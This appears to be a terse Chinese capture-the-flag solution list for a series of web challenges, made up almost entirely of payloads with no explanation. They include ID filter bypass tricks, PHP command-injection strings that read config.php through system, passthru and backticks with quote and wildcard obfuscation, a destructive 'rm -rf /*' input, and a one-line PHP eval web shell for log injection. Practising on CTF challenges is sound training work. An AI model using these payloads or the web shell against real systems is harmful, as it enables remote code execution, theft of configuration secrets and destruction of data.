[huayang]

we1-web7大抵差不多构造id=1000

web1

?id='1000'

[huayang]web2

?id=~~1000

web3

?id=680|960

web4

?id=682^322

web5

?id=800^200

web6

?id=~~1000

web7

?id=0b1111101000

web8

?flag=rm -rf /*

web9

?c=system('nl config.php');

web10

?c=show_source('config.php');

web11

?c=echo `nl config.php`;

web12

?c=echo `nl con''fig?ph''p`;

web13

?c=passthru('nl conf\ig?p\hp')?>

web14

?c=echo `nl conf''ig?p''hp`?>

web15

get:
?c=echo `$_POST[shell]`;
post:
shell=nl config.php

web16

?c=36d

web17-21

直接日志注入

<?php eval($_POST[shell]);?>

[/huayang]

FROM：浅浅淡淡[hellohy]